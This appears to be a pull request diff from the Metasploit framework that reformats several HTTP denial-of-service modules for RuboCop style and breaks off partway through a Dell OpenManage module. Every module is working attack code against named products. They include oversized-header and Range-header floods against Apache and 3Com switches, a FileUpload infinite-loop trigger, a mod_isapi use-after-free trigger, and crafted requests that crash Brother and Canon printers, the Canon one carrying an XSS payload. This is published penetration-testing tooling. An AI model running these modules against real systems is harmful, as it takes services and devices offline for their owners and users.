### PR TITLE
modules/auxiliary/dos/http: Resolve RuboCop violations

### DIFF
--- a/modules/auxiliary/dos/http/3com_superstack_switch.rb
+++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb
@@ -8,46 +8,51 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => '3Com SuperStack Switch Denial of Service',
-      'Description'    => %q{
-        This module causes a temporary denial of service condition
-        against 3Com SuperStack switches. By sending excessive data
-        to the HTTP Management interface, the switch stops responding
-        temporarily. The device does not reset. Tested successfully
-        against a 3300SM firmware v2.66. Reported to affect versions
-        prior to v2.72.
-      },
-      'Author'         => [ 'aushack' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => '3Com SuperStack Switch Denial of Service',
+        'Description' => %q{
+          This module causes a temporary denial of service condition
+          against 3Com SuperStack switches. By sending excessive data
+          to the HTTP Management interface, the switch stops responding
+          temporarily. The device does not reset. Tested successfully
+          against a 3300SM firmware v2.66. Reported to affect versions
+          prior to v2.72.
+        },
+        'Author' => [ 'aushack' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           # aushack - I am not sure if these are correct, but the closest match!
           [ 'OSVDB', '7246' ],
           [ 'CVE', '2004-2691' ],
           [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
         ],
-      'DisclosureDate' => '2004-06-24'))
+        'DisclosureDate' => '2004-06-24',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
-    register_options( [ Opt::RPORT(80) ])
+    register_options([ Opt::RPORT(80) ])
   end
 
   def run
-    begin
-      connect
-      print_status("Sending DoS packet to #{rhost}:#{rport}")
+    connect
+    print_status("Sending DoS packet to #{rhost}:#{rport}")
 
-      sploit = "GET / HTTP/1.0\r\n"
-      sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 128000
+    sploit = "GET / HTTP/1.0\r\n"
+    sploit << 'Referer: ' + Rex::Text.rand_text_alpha(1) * 128000
 
-      sock.put(sploit +"\r\n\r\n")
-      disconnect
-      print_error("DoS packet unsuccessful")
-    rescue ::Rex::ConnectionRefused
-      print_error("Unable to connect to #{rhost}:#{rport}")
-    rescue ::Errno::ECONNRESET
-      print_good("DoS packet successful. #{rhost} not responding.")
-    end
-
+    sock.put(sploit + "\r\n\r\n")
+    disconnect
+    print_error('DoS packet unsuccessful')
+  rescue ::Rex::ConnectionRefused
+    print_error("Unable to connect to #{rhost}:#{rport}")
+  rescue ::Errno::ECONNRESET
+    print_good("DoS packet successful. #{rhost} not responding.")
   end
 end

--- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
+++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
@@ -8,46 +8,53 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',
-      'Description'     => %q{
-        This module triggers an infinite loop in Apache Commons FileUpload 1.0
-        through 1.3 via a specially crafted Content-Type header.
-        Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
-        mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
-        and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
-        uses Commons FileUpload as part of the Manager application.
-       },
-       'Author'         =>
-         [
-           'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
-           'ribeirux' # metasploit module
-         ],
-       'License'        => MSF_LICENSE,
-       'References'     =>
-         [
-           ['CVE', '2014-0050'],
-           ['URL', 'https://tomcat.apache.org/security-8.html'],
-           ['URL', 'https://tomcat.apache.org/security-7.html']
-         ],
-        'DisclosureDate' => '2014-02-06'
-      ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
+        'Description' => %q{
+          This module triggers an infinite loop in Apache Commons FileUpload 1.0
+          through 1.3 via a specially crafted Content-Type header.
+          Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
+          mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
+          and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
+          uses Commons FileUpload as part of the Manager application.
+        },
+        'Author' => [
+          'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
+          'ribeirux' # metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2014-0050'],
+          ['URL', 'https://tomcat.apache.org/security-8.html'],
+          ['URL', 'https://tomcat.apache.org/security-7.html']
+        ],
+        'DisclosureDate' => '2014-02-06',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
-      register_options(
-        [
-          Opt::RPORT(8080),
-          OptString.new('TARGETURI', [ true,  "The request URI", '/']),
-          OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
-        ])
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The request URI', '/']),
+        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])
+      ]
+    )
   end
 
   def run
-    boundary = "0"*4092
+    boundary = '0' * 4092
     opts = {
-      'method'         => "POST",
-      'uri'            => normalize_uri(target_uri.to_s),
-      'ctype'          => "multipart/form-data; boundary=#{boundary}",
-      'data'           => "#{boundary}00000",
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.to_s),
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => "#{boundary}00000",
       'headers' => {
         'Accept' => '*/*'
       }
@@ -63,8 +70,8 @@ class MetasploitModule < Msf::Auxiliary
         r = c.request_cgi(opts)
         c.send_request(r)
         # Don't wait for a response
-      rescue ::Rex::ConnectionError => exception
-        print_error("Unable to connect: '#{exception.message}'")
+      rescue ::Rex::ConnectionError => e
+        print_error("Unable to connect: '#{e.message}'")
         return
       ensure
         disconnect(c) if c
@@ -72,4 +79,3 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 end
-

--- a/modules/auxiliary/dos/http/apache_mod_isapi.rb
+++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb
@@ -8,38 +8,38 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache mod_isapi Dangling Pointer',
-      'Description'    => %q{
-        This module triggers a use-after-free vulnerability in the Apache
-        Software Foundation mod_isapi extension for versions 2.2.14 and earlier.
-        In order to reach the vulnerable code, the target server must have an
-        ISAPI module installed and configured.
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache mod_isapi Dangling Pointer',
+        'Description' => %q{
+          This module triggers a use-after-free vulnerability in the Apache
+          Software Foundation mod_isapi extension for versions 2.2.14 and earlier.
+          In order to reach the vulnerable code, the target server must have an
+          ISAPI module installed and configured.
 
-        By making a request that terminates abnormally (either an aborted TCP
-        connection or an unsatisfied chunked request), mod_isapi will unload the
-        ISAPI extension. Later, if another request comes for that ISAPI module,
-        previously obtained pointers will be used resulting in an access
-        violation or potentially arbitrary code execution.
+          By making a request that terminates abnormally (either an aborted TCP
+          connection or an unsatisfied chunked request), mod_isapi will unload the
+          ISAPI extension. Later, if another request comes for that ISAPI module,
+          previously obtained pointers will be used resulting in an access
+          violation or potentially arbitrary code execution.
 
-        Although arbitrary code execution is theoretically possible, a
-        real-world method of invoking this consequence has not been proven. In
-        order to do so, one would need to find a situation where a particular
-        ISAPI module loads at an image base address that can be re-allocated by
-        a remote attacker.
+          Although arbitrary code execution is theoretically possible, a
+          real-world method of invoking this consequence has not been proven. In
+          order to do so, one would need to find a situation where a particular
+          ISAPI module loads at an image base address that can be re-allocated by
+          a remote attacker.
 
-        Limited success was encountered using two separate ISAPI modules. In
-        this scenario, a second ISAPI module was loaded into the same memory
-        area as the previously unloaded module.
-      },
-      'Author'         =>
-        [
-          'Brett Gervasoni',  # original discovery
+          Limited success was encountered using two separate ISAPI modules. In
+          this scenario, a second ISAPI module was loaded into the same memory
+          area as the previously unloaded module.
+        },
+        'Author' => [
+          'Brett Gervasoni', # original discovery
           'jduck'
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2010-0425' ],
           [ 'OSVDB', '62674'],
           [ 'BID', '38494' ],
@@ -48,7 +48,14 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
           [ 'EDB', '11650' ]
         ],
-      'DisclosureDate' => '2010-03-05'))
+        'DisclosureDate' => '2010-03-05',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([
       Opt::RPORT(80),
@@ -57,37 +64,35 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-
-    serverIP = datastore['RHOST']
+    server_ip = datastore['RHOST']
     if (datastore['RPORT'].to_i != 80)
-      serverIP += ":" + datastore['RPORT'].to_s
+      server_ip += ':' + datastore['RPORT'].to_s
     end
-    isapiURI = datastore['ISAPI']
+    isapi_uri = datastore['ISAPI']
 
     # Create a stale pointer using the vulnerability
-    print_status("Causing the ISAPI dll to be loaded and unloaded...")
-    unload_trigger = "POST " + isapiURI + " HTTP/1.0\r\n" +
-      "Pragma: no-cache\r\n" +
-      "Proxy-Connection: Keep-Alive\r\n" +
-      "Host: " + serverIP + "\r\n" +
-      "Transfer-Encoding: chunked\r\n" +
-      "Content-Length: 40334\r\n\r\n" +
-      Rex::Text.rand_text_alphanumeric(rand(128)+128)
+    print_status('Causing the ISAPI dll to be loaded and unloaded...')
+    unload_trigger = 'POST ' + isapi_uri + " HTTP/1.0\r\n" \
+                     "Pragma: no-cache\r\n" \
+                     "Proxy-Connection: Keep-Alive\r\n" \
+                     'Host: ' + server_ip + "\r\n" \
+                     "Transfer-Encoding: chunked\r\n" \
+                     "Content-Length: 40334\r\n\r\n" +
+                     Rex::Text.rand_text_alphanumeric(128..255)
     connect
     sock.put(unload_trigger)
     disconnect
 
     # Now make the stale pointer get used...
-    print_status("Triggering the crash ...")
-    data = Rex::Text.rand_text_alphanumeric(rand(256)+1337)
-    crash_trigger = "POST " + isapiURI + " HTTP/1.0\r\n" +
-      "Host: " + serverIP + "\r\n" +
-      "Content-Length: #{data.length}\r\n\r\n" +
-      data
+    print_status('Triggering the crash ...')
+    data = Rex::Text.rand_text_alphanumeric(1337..1592)
+    crash_trigger = 'POST ' + isapi_uri + " HTTP/1.0\r\n" \
+                    'Host: ' + server_ip + "\r\n" \
+                    "Content-Length: #{data.length}\r\n\r\n" +
+                    data
 
     connect
     sock.put(crash_trigger)
     disconnect
-
   end
 end

--- a/modules/auxiliary/dos/http/apache_range_dos.rb
+++ b/modules/auxiliary/dos/http/apache_range_dos.rb
@@ -10,117 +10,125 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Range Header DoS (Apache Killer)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Range Header DoS (Apache Killer)',
+        'Description' => %q{
           The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x
-        through 2.2.19 allows remote attackers to cause a denial of service (memory and
-        CPU consumption) via a Range header that expresses multiple overlapping ranges,
-        exploit called "Apache Killer"
-      },
-      'Author'         =>
-        [
-          'Kingcope', #original discoverer
-          'Masashi Fujiwara', #metasploit module
+          through 2.2.19 allows remote attackers to cause a denial of service (memory and
+          CPU consumption) via a Range header that expresses multiple overlapping ranges,
+          exploit called "Apache Killer".
+        },
+        'Author' => [
+          'Kingcope', # original discovery
+          'Masashi Fujiwara', # metasploit module
           'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
         ],
-      'License'        => MSF_LICENSE,
-      'Actions'        =>
-        [
-          ['DOS', 'Description' => 'Trigger Denial of Service against target'],
-          ['CHECK', 'Description' => 'Check if target is vulnerable']
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          ['DOS', { 'Description' => 'Trigger Denial of Service against target' }],
+          ['CHECK', { 'Description' => 'Check if target is vulnerable' }]
         ],
-      'DefaultAction'  => 'DOS',
-      'References'     =>
-        [
+        'DefaultAction' => 'DOS',
+        'References' => [
           [ 'BID', '49303'],
           [ 'CVE', '2011-3192'],
           [ 'EDB', '17696'],
           [ 'OSVDB', '74721' ],
         ],
-      'DisclosureDate' => '2011-08-19'
-    ))
+        'DisclosureDate' => '2011-08-19',
+        'Notes' => {
+          'AKA' => ['Apache Killer'],
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('URI', [ true,  "The request URI", '/']),
-        OptInt.new('RLIMIT', [ true,  "Number of requests to send",50])
-      ])
+        OptString.new('URI', [ true, 'The request URI', '/']),
+        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 50])
+      ]
+    )
   end
 
-  def run_host(ip)
-
+  def run_host(_ip)
     case action.name
     when 'DOS'
-      conduct_dos()
+      conduct_dos
 
     when 'CHECK'
-      check_for_dos()
+      check_for_dos
     end
-
   end
 
-  def check_for_dos()
+  def check_for_dos
     uri = datastore['URI']
     rhost = datastore['RHOST']
-    begin
-      res = send_request_cgi({
-        'uri'     =>  uri,
-        'method'  => 'HEAD',
-        'headers' => {
-          "HOST"  => rhost,
-          "Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10",
-          "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
-        }
-      })
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'HEAD',
+      'headers' => {
+        'HOST' => rhost,
+        'Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10',
+        'Request-Range' => 'bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10'
+      }
+    })
 
-      if (res and res.code == 206)
-        print_status("Response was #{res.code}")
-        print_status("Found Byte-Range Header DOS at #{uri}")
+    if res && res.code == 206
+      print_status("Response was #{res.code}")
+      print_status("Found Byte-Range Header DOS at #{uri}")
 
-        report_note(
-          :host   => rhost,
-          :port   => rport,
-          :type   => 'apache.killer',
-          :data   => "Apache Byte-Range DOS at #{uri}"
-        )
+      report_note(
+        host: rhost,
+        port: rport,
+        type: 'apache.killer',
+        data: "Apache Byte-Range DOS at #{uri}"
+      )
 
-      else
-        print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")
-      end
-
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      rescue ::Timeout::Error, ::Errno::EPIPE
+    else
+      print_status("#{rhost} doesn't seem to be vulnerable at #{uri}")
     end
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
+    vprint_error(e.message)
   end
 
-
-  def conduct_dos()
-    uri = datastore['URI']
+  def conduct_dos
+    datastore['URI']
     rhost = datastore['RHOST']
     ranges = ''
+
     for i in (0..1299) do
-      ranges += ",5-" + i.to_s
+      ranges += ',5-' + i.to_s
     end
+
     for x in 1..datastore['RLIMIT']
       begin
         print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
-        res = send_request_cgi({
-          'uri'     =>  uri,
-          'method'  => 'HEAD',
-          'headers' => {
-            "HOST"  => rhost,
-            "Range" => "bytes=0-#{ranges}",
-            "Request-Range" => "bytes=0-#{ranges}"}},1)
-
+        _res = send_request_cgi(
+          {
+            'uri' => uri,
+            'method' => 'HEAD',
+            'headers' => {
+              'HOST' => rhost,
+              'Range' => "bytes=0-#{ranges}",
+              'Request-Range' => "bytes=0-#{ranges}"
+            }
+          },
+          1
+        )
       rescue ::Rex::ConnectionRefused
         print_error("Unable to connect to #{rhost}:#{rport}")
       rescue ::Errno::ECONNRESET
         print_good("DoS packet successful. #{rhost} not responding.")
       rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
         print_error("Couldn't connect to #{rhost}:#{rport}")
-      rescue ::Timeout::Error, ::Errno::EPIPE
+      rescue ::Timeout::Error, ::Errno::EPIPE => e
+        vprint_error(e.message)
       end
     end
   end

--- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
+++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb
@@ -8,34 +8,42 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',
+        'Description' => %q{
           Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not
-        properly handle an invalid Transfer-Encoding header, which allows remote attackers
-        to cause a denial of service (application outage) or obtain sensitive information
-        via a crafted header that interferes with "recycling of a buffer."
-      },
-      'Author'         =>
-        [
+          properly handle an invalid Transfer-Encoding header, which allows remote attackers
+          to cause a denial of service (application outage) or obtain sensitive information
+          via a crafted header that interferes with "recycling of a buffer."
+        },
+        'Author' => [
           'Steve Jones', # original discoverer
           'Hoagie <andi[at]void.at>', # original public exploit
           'Paulino Calderon <calderon[at]websec.mx>', # metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2010-2227' ],
           [ 'OSVDB', '66319' ],
           [ 'BID', '41544' ]
         ],
-      'DisclosureDate' => '2010-07-09'))
+        'DisclosureDate' => '2010-07-09',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(8000),
-        OptInt.new('RLIMIT', [ true,  "Number of requests to send", 25])
-      ])
+        OptInt.new('RLIMIT', [ true, 'Number of requests to send', 25])
+      ]
+    )
   end
 
   def run
@@ -45,7 +53,7 @@ class MetasploitModule < Msf::Auxiliary
         print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
 
         sploit = "POST / HTTP/1.1\r\n"
-        sploit << "Host: " + rhost + "\r\n"
+        sploit << 'Host: ' + rhost + "\r\n"
         sploit << "Transfer-Encoding: buffered\r\n"
         sploit << "Content-Length: 65537\r\n\r\n"
         sploit << Rex::Text.rand_text_alpha(1) * 65537
@@ -53,14 +61,15 @@ class MetasploitModule < Msf::Auxiliary
         sock.put(sploit + "\r\n\r\n")
         disconnect
 
-        print_error("DoS packet unsuccessful")
+        print_error('DoS packet unsuccessful')
       rescue ::Rex::ConnectionRefused
         print_error("Unable to connect to #{rhost}:#{rport}")
       rescue ::Errno::ECONNRESET
         print_good("DoS packet successful. #{rhost} not responding.")
       rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
         print_error("Couldn't connect to #{rhost}:#{rport}")
-      rescue ::Timeout::Error, ::Errno::EPIPE
+      rescue ::Timeout::Error, ::Errno::EPIPE => e
+        vprint_error(e.message)
       end
     end
   end

--- a/modules/auxiliary/dos/http/brother_debut_dos.rb
+++ b/modules/auxiliary/dos/http/brother_debut_dos.rb
@@ -8,32 +8,40 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Brother Debut http Denial Of Service',
-      'Description'    => %q{
-        The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial
-        of Service (DoS) condition via a crafted HTTP request.  The printer will be
-        unresponsive from HTTP and printing requests for ~300 seconds.  After which, the
-        printer will start responding again.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-      [
-        'z00n <0xz00n@gmail.com>', # vulnerability disclosure
-        'h00die' # metasploit module
-      ],
-      'References'     => [
-        [ 'CVE', '2017-16249' ],
-        [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730']
-      ],
-      'DisclosureDate' => '2017-11-02'))
+    super(
+      update_info(
+        info,
+        'Name' => 'Brother Debut http Denial Of Service',
+        'Description' => %q{
+          The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial
+          of Service (DoS) condition via a crafted HTTP request.  The printer will be
+          unresponsive from HTTP and printing requests for ~300 seconds.  After which, the
+          printer will start responding again.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'z00n <0xz00n@gmail.com>', # vulnerability disclosure
+          'h00die' # metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2017-16249' ],
+          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730']
+        ],
+        'DisclosureDate' => '2017-11-02',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
   end
 
   def is_alive?
     res = send_request_raw({
       'method'	=> 'GET',
-      'uri'	=> '/',
-    },10)
+      'uri'	=> '/'
+    }, 10)
 
     return !res.nil?
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
@@ -46,35 +54,35 @@ class MetasploitModule < Msf::Auxiliary
     data = Rex::Text.rand_text_alphanumeric(40)
     send_request_cgi({
       'method' => 'POST',
-      'uri'    => '/',
-      'data'   => data, #'asdasdasdasdasdasdasd',
+      'uri' => '/',
+      'data' => data, # 'asdasdasdasdasdasdasd',
       'headers' => {
         # These are kept here since they were in the original exploit, however they are not required
-        #'Host' => 'asdasdasd',
-        #'User-Agent' => 'asdasdasd',
-        #'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-        #'Accept-Language' => 'en-US,en;q=0.5',
-        #'Referer' => 'asdasdasdasd',
-        #'Connection' => 'close',
-         #'Upgrade-Insecure-Requests' => 1,
-        #'Content-Type' => 'application/x-www-form-urlencoded',
-        'Content-Length' => data.length + rand(10) + 10 #42
-        }
-      })
+        # 'Host' => 'asdasdasd',
+        # 'User-Agent' => 'asdasdasd',
+        # 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+        # 'Accept-Language' => 'en-US,en;q=0.5',
+        # 'Referer' => 'asdasdasdasd',
+        # 'Connection' => 'close',
+        # 'Upgrade-Insecure-Requests' => 1,
+        # 'Content-Type' => 'application/x-www-form-urlencoded',
+        'Content-Length' => data.length + rand(10) + 10 # 42
+      }
+    })
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
     print_error("Couldn't connect to #{peer}")
   end
 
   def run
     time = Time.new
-    print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}.")
+    print_status("Sending malformed POST request at #{time.strftime('%Y-%m-%d %H:%M:%S')}.")
     dos
 
     # Check to see if it worked or not
     if is_alive?
       print_error("#{peer} - Server is still alive.")
     else
-      print_good("#{peer} - Connection Refused: Success! Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
+      print_good("#{peer} - Connection Refused: Success! Server will recover about #{(time + 300).strftime('%Y-%m-%d %H:%M:%S')}")
     end
   end
 end

--- a/modules/auxiliary/dos/http/canon_wireless_printer.rb
+++ b/modules/auxiliary/dos/http/canon_wireless_printer.rb
@@ -8,75 +8,80 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Canon Wireless Printer Denial Of Service',
-      'Description'    => %q{
-        The HTTP management interface on several models of Canon Wireless printers
-        allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:
-        if this module is successful, the device can only be recovered with a physical
-        power cycle.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-      [
-        'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
-      ],
-      'References'     => [
-        [ 'CVE', '2013-4615' ],
-        [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
-      ],
-      'DisclosureDate' => '2013-06-18'))
+    super(
+      update_info(
+        info,
+        'Name' => 'Canon Wireless Printer Denial Of Service',
+        'Description' => %q{
+          The HTTP management interface on several models of Canon Wireless printers
+          allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:
+          if this module is successful, the device can only be recovered with a physical
+          power cycle.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
+        ],
+        'References' => [
+          [ 'CVE', '2013-4615' ],
+          [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
+        ],
+        'DisclosureDate' => '2013-06-18',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
   end
 
   def is_alive?
     res = send_request_raw({
       'method'	=>	'GET',
-      'uri'		=>	'/',
-    },10)
+      'uri'	=>	'/'
+    }, 10)
 
     return !res.nil?
   end
 
   def run
-
     begin
-
       # The first request will set the new IP
-      res = send_request_cgi({
+      send_request_cgi({
         'method'	=>	'POST',
-        'uri'		=>	'/English/pages_MacUS/cgi_lan.cgi',
-        'data'		=>	'OK.x=61' +
-          '&OK.y=12' +
-          '&LAN_OPT1=2' +
-          '&LAN_TXT1=Wireless' +
-          '&LAN_OPT3=1' +
-          '&LAN_TXT21=192' +
-          '&LAN_TXT22=168' +
-          '&LAN_TXT23=1' +
-          '&LAN_TXT24=114"><script>alert(\'xss\');</script>' +
-          '&LAN_TXT31=255' +
-          '&LAN_TXT32=255' +
-          '&LAN_TXT33=255' +
-          '&LAN_TXT34=0' +
-          '&LAN_TXT41=192' +
-          '&LAN_TXT42=168' +
-          '&LAN_TXT43=1' +
-          '&LAN_TXT44=1' +
-          '&LAN_OPT2=4' +
-          '&LAN_OPT4=1' +
+        'uri'	=>	'/English/pages_MacUS/cgi_lan.cgi',
+        'data'	=>	'OK.x=61' \
+          '&OK.y=12' \
+          '&LAN_OPT1=2' \
+          '&LAN_TXT1=Wireless' \
+          '&LAN_OPT3=1' \
+          '&LAN_TXT21=192' \
+          '&LAN_TXT22=168' \
+          '&LAN_TXT23=1' \
+          '&LAN_TXT24=114"><script>alert(\'xss\');</script>' \
+          '&LAN_TXT31=255' \
+          '&LAN_TXT32=255' \
+          '&LAN_TXT33=255' \
+          '&LAN_TXT34=0' \
+          '&LAN_TXT41=192' \
+          '&LAN_TXT42=168' \
+          '&LAN_TXT43=1' \
+          '&LAN_TXT44=1' \
+          '&LAN_OPT2=4' \
+          '&LAN_OPT4=1' \
           '&LAN_HID1=1'
       })
-
-      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
-        print_error("Couldn't connect to #{rhost}:#{rport}")
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+      print_error("Couldn't connect to #{rhost}:#{rport}")
       return
     end
 
     # The second request will load the network options page, which seems to trigger the DoS
     send_request_cgi({
       'method'	=>	'GET',
-      'uri'		=>	'/English/pages_MacUS/lan_set_content.html'
-    },5) #default timeout, we don't care about the response
+      'uri'	=>	'/English/pages_MacUS/lan_set_content.html'
+    }, 5) # default timeout, we don't care about the response
 
     # Check to see if it worked or not
     if is_alive?
@@ -84,6 +89,5 @@ class MetasploitModule < Msf::Auxiliary
     else
       print_good("#{rhost}:#{rport} - Connection Refused: Success!")
     end
-
   end
 end

--- a/modules/auxiliary/dos/http/dell_openmanage_post.rb
+++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb
@@ -8,45 +8,53 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Dell OpenManage POST Request Heap Overflow (win32)',
-      'Description'    => %q{
-        This module exploits a heap overflow in the Dell OpenManage
-        Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
-        exists due to a boundary error within the handling of POST requests,
-        where the application input is set to an overly long file name.
-        This module will crash the web server, however it is likely exploitable
-        under certain conditions.
-      },
-      'Author'         => [ 'aushack' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
+        'Description' => %q{
+          This module exploits a heap overflow in the Dell OpenManage
+          Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
+          exists due to a boundary error within the handling of POST requests,
+          where the application input is set to an overly long file name.
+          This module will crash the web server, however it is likely exploitable
+          under certain conditions.
+        },
+        'Author' => [ 'aushack' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
           [ 'BID', '9750' ],
           [ 'OSVDB', '4077' ],
           [ 'CVE', '2004-0331' ],
         ],
-      'DisclosureDate' => '2004-02-26'))
+        'DisclosureDate' => '2004-02-26',
+        'Notes' => {
